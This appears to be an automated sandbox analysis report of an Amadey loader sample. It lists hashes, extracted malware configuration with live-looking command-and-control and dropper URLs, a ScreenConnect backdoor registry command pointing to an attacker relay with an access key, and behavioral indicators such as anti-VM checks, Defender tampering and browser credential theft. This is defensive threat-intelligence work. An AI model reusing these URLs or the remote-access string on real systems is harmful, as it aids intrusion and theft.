amadey | 84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446

Analysis

max time kernel
127s
max time network
148s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
26/03/2025, 14:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
Size

1.8MB
MD5

155557f5e69e2cf0af05029b9c80d4a1
SHA1

e53704de709ccbddc75a3f2e3b854fc3a0d99c74
SHA256

84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446
SHA512

2c644539e33396d9127ace36a1f764bbc5a2a984562c86494ea3af30b8896a295e1cdd5faa4dd00b70e998e255b7ad36ccac1116636be02c84d1e374b1975db1
SSDEEP

49152:70mBuV7OfF/Ybv9tTrNzvRuYnHlPKGPY:706uV0WL9tHjuspPY

Score

10^/10

amadey gcleaner healer 092155 credential_access defense_evasion discovery dropper execution exploit loader persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects Healer an antivirus disabler dropper 2 IoCs

resource	yara_rule
behavioral1/memory/3364-4783-0x00000000013D0000-0x0000000001824000-memory.dmp	healer
behavioral1/memory/3364-4793-0x00000000013D0000-0x0000000001824000-memory.dmp	healer

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 2852 created 1188	2852	Exam.com	21
PID 2724 created 1188	2724	Exam.com	21
PID 1984 created 1188	1984	Exam.com	21
PID 2488 created 1188	2488	Exam.com	21

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cdfca381b2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5c58648e92.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7cec070324.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempXDSVAZCYSF9JZHVCOIN4MTVBZHSORBDJ.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dd61b02106.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3bf4987416.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
45	2124	powershell.exe
49	1500	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2124	powershell.exe
1500	powershell.exe
2968	powershell.exe
2872	powershell.exe
2492	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 16 IoCs

flow	pid	Process
32	2780	rapes.exe
32	2780	rapes.exe
32	2780	rapes.exe
32	2780	rapes.exe
32	2780	rapes.exe
52	2780	rapes.exe
59	1488	svchost015.exe
5	2780	rapes.exe
26	2780	rapes.exe
45	2124	powershell.exe
6	2780	rapes.exe
6	2780	rapes.exe
6	2780	rapes.exe
49	1500	powershell.exe
51	2780	rapes.exe
64	2780	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2104	takeown.exe
272	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (f63a82ffaf9f93d1)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=horipalok.top&p=8880&s=11195fc6-1b49-4d73-b718-faf3a932e47f&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAbBjfPxY3%2b0CxFbEEb0GS%2fQAAAAACAAAAAAAQZgAAAAEAACAAAAAFLm0HKm5pmqk01cN%2fYveDdV3Ez3o8aRkw2iHEAiU2%2fgAAAAAOgAAAAAIAACAAAACWdKAd66nYmOrYxj6ZRcpF4Snbiy7WBaZUYcw1R9KTmqAEAAC%2fwjmJdhTUvmTxeutgnoS5N1MdvYoPBKRkfyzvv1pt2dR%2fkygxScoeagDbSS6YTUk29WGtXat0MqdRVebAlXAWDCRxsP8BnF94Re10gLe0x6ST7T5OKPMgGkq9uwzD01V4Eyoc%2fJpoOopeCl%2bbZbQBArcaFemFSgKx4lKGt7py8AeT%2bVg%2bEkV3cDv%2fw74OWIXgyQf5VBNGt452AVt9e9gwtQEjuik1AULbFLPMLLFuk4rcoQfxabZL5dc2fNGdWVNDgPxCkJaG2BsiqHuOsLThuOedCRsRH7pA6%2brcNuDnnSCzrFdPB2h6Vhn8lMLbvO9q5WeBoAnQTGtFz%2b3TBSy07UsvUB215CgYT4CfGxaJ6Z9Eozo%2bQDRjr1F8qgh%2b1ouoS2UjO85OqndYIIgRVj0NLapmLlp14ojA7MeBmBu7TfNQjnrW%2b%2fkp3sStUQhqlk4aQPStGXHobg%2b4DrYk%2bJKPK0ofixlNgUCe29yvkwFSaILz2g9zy8MnHmF%2ff9Y8ktUYY0kQPpozR54%2b3S505eJuI8KGe2383vCOCa8ct4LFUGIQE%2fFDc6YVEOU7GDTrhWYdRyJlVfIhER%2fljbx5NM3CNTl0qWMtoXEbwD6Tv62VnnR5Z8syVTgTsOwaiicrO%2bHsCc9B2j%2fmAdiQfesJkmJ86jSbU6kasYzbk9VCvlAvDcNek16URJFmYArWNbHWk572heKT%2bryYR2xhJdpsaCe0kzMXOdlq3YHG9rmci6tPH%2bcoBSJEOMJoD%2bJyfAjEAFDEtaQ1MTOYbibDQau9D95TDe5XgFna2HSjgxwQV9nPOU2Dww3lzIlkAUTAzDPg7dIewWAcso9X4%2blTee1iMptMhrsryYY5eVtjNDmUbgnE8WutYGyZdCzWlmZ%2fx2yq3vOB0i08uu5n5PqPaVlfrjv4%2bg4Zc2cTQ17vug%2f5zksS%2fThMZalVe7l4JMiaws8XmO4OKHmbxpDwq3G6wglrsvcfD9NynudoQpQoT22UN6W5DFmaoKJwPF9qD%2bY5Pnmv8%2flnayrjVl3CP3c8yyx13DBBHVUyYpb7zWsf49gG1cYDzBq8wsdRolOxJDdqi6Bou08pGuIDi%2fBuNAAX0tseSV%2fBTJIVjaLey8jclr4d%2b6elxpPVTHuQPJoA7U%2fHnXwJXUuWX7SC1%2fAwHte84p0czC5Ou4SZ432dDS%2fXIAsJKDWMzDzkDUmxDndGmpltgfMLGcMngUJ29bkG5kMKGNF0arybvjlz8Gfbg0Lhx3ekdmSiun1YB446GS%2bhpTZlkO%2bBAhNCEQpPFCNL8MoQhEjuE155kIzDj2JSs6Evg7RTuhfegUDrvbEuaT%2bkN92yldd5qZhPCj50B72FH5xW%2bXwCHMvukKcU1qyqTIJ0EORNcFPpbRwZcwxFl4EGGTuL4IdIYMJo4eRp1MW6HSyVCRLDAiFLZ8dGPuk%2b6eDKAZ2c5p9YR5ftWUjFjjg3vds%2fJeCZ2E9%2bhD14ntpQJfE9%2bUayhu1D86zrETK9Egn199%2fAI1lN0dHYK21wBBnZHCFx3ii%2fE3gPi8O9n5TRs9RkTCoRHaJ%2bFA3vKkTwYOLfLKjV56Qmc0AAAAAN5P5gzhUO%2bWFLLdDkUX11jfuAv31bWjZp0o5pu4JZOUmrVTWBrmuXHLGxpIBMTiAufNSc9UXjqJcdQX5aMD3G&t=purchased\""	ScreenConnect.ClientService.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1556	chrome.exe
3188	chrome.exe
3600	chrome.exe
3136	chrome.exe
3096	chrome.exe
1680	chrome.exe
1948	chrome.exe
1800	chrome.exe

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cdfca381b2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempXDSVAZCYSF9JZHVCOIN4MTVBZHSORBDJ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5c58648e92.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7cec070324.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dd61b02106.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7cec070324.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempXDSVAZCYSF9JZHVCOIN4MTVBZHSORBDJ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dd61b02106.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3bf4987416.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3bf4987416.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cdfca381b2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5c58648e92.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 39 IoCs

pid	Process
2780	rapes.exe
2960	f73ae_003.exe
1244	7IIl2eE.exe
2068	Passwords.com
2396	apple.exe
2988	11.exe
2540	11.exe
784	TbV75ZR.exe
2852	Exam.com
1688	cdfca381b2.exe
1580	tool.exe
2012	Exam.com
1376	WLbfHbp.exe
2724	Exam.com
1952	ScreenConnect.ClientService.exe
852	ScreenConnect.WindowsClient.exe
1920	ScreenConnect.WindowsClient.exe
2176	BIm18E9.exe
1464	5c58648e92.exe
1236	Exam.com
1488	svchost015.exe
2660	7cec070324.exe
296	svchost015.exe
2716	b66824f2c4.exe
1612	TempXDSVAZCYSF9JZHVCOIN4MTVBZHSORBDJ.EXE
2320	WLbfHbp.exe
2852	483d2fa8a0d53818306efeb32d3.exe
1984	Exam.com
2304	f73ae_003.exe
2184	TbV75ZR.exe
2488	Exam.com
2744	7IIl2eE.exe
2124	Passwords.com
2460	d503addcb6.exe
1044	BIm18E9.exe
1304	BIm18E9.exe
2364	dd61b02106.exe
1580	BIm18E9.exe
1560	3bf4987416.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	5c58648e92.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	TempXDSVAZCYSF9JZHVCOIN4MTVBZHSORBDJ.EXE
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	3bf4987416.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	cdfca381b2.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	7cec070324.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	dd61b02106.exe

Loads dropped DLL 64 IoCs

pid	Process
2204	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
2780	rapes.exe
2780	rapes.exe
1244	7IIl2eE.exe
2948	CMD.exe
2780	rapes.exe
2396	apple.exe
2396	apple.exe
2396	apple.exe
2396	apple.exe
2780	rapes.exe
784	TbV75ZR.exe
2636	CMD.exe
2780	rapes.exe
2780	rapes.exe
2780	rapes.exe
2852	Exam.com
1764	MsiExec.exe
1380	rundll32.exe
1380	rundll32.exe
1380	rundll32.exe
1380	rundll32.exe
1380	rundll32.exe
1380	rundll32.exe
1380	rundll32.exe
1380	rundll32.exe
1380	rundll32.exe
2780	rapes.exe
1376	WLbfHbp.exe
1896	CMD.exe
1732	MsiExec.exe
1672	MsiExec.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
1952	ScreenConnect.ClientService.exe
2780	rapes.exe
2780	rapes.exe
2780	rapes.exe
2780	rapes.exe
2724	Exam.com
1464	5c58648e92.exe
2780	rapes.exe
2780	rapes.exe
2660	7cec070324.exe
2780	rapes.exe
2124	powershell.exe
2780	rapes.exe
2320	WLbfHbp.exe
1500	powershell.exe
2380	CMD.exe
2780	rapes.exe
2780	rapes.exe
2184	TbV75ZR.exe
1088	CMD.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2104	takeown.exe
272	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\b66824f2c4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341150101\\b66824f2c4.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341160121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\dd61b02106.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341230101\\dd61b02106.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\3bf4987416.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341240101\\3bf4987416.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000200000000f86d-2333.dat	autoit_exe
behavioral1/files/0x000400000001cc9b-4535.dat	autoit_exe

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

persistence privilege_escalation

Authentication Package

T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800660036003300610038003200660066006100660039006600390033006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\uo2nubq1.tmp	ScreenConnect.ClientService.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\uo2nubq1.newcfg	ScreenConnect.ClientService.exe

Enumerates processes with tasklist 1 TTPs 12 IoCs

discovery

Process Discovery

T1057

pid	Process
1720	tasklist.exe
852	tasklist.exe
1216	tasklist.exe
2472	tasklist.exe
1720	tasklist.exe
2280	tasklist.exe
2180	tasklist.exe
928	tasklist.exe
1676	tasklist.exe
1412	tasklist.exe
1304	tasklist.exe
2076	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
2204	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
2780	rapes.exe
1688	cdfca381b2.exe
1464	5c58648e92.exe
2660	7cec070324.exe
1612	TempXDSVAZCYSF9JZHVCOIN4MTVBZHSORBDJ.EXE
2852	483d2fa8a0d53818306efeb32d3.exe
2364	dd61b02106.exe
1560	3bf4987416.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1464 set thread context of 1488	1464	5c58648e92.exe	163
PID 2660 set thread context of 296	2660	7cec070324.exe	165

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\MpClient.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsFileManager.exe.config	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\MpRTP.dll	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsFileManager.exe	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpOAV.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpEvMsg.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpOAV.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpSvc.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpCom.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpClient.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MsMpLics.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpAsDesc.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\system.config	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\MpCmdRun.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MSASCui.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsAuthenticationPackage.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.Override.en-US.resources	msiexec.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpAsDesc.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.Override.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.resources	msiexec.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsCredentialProvider.dll	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpCommu.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpLics.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpRes.dll	cmd.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
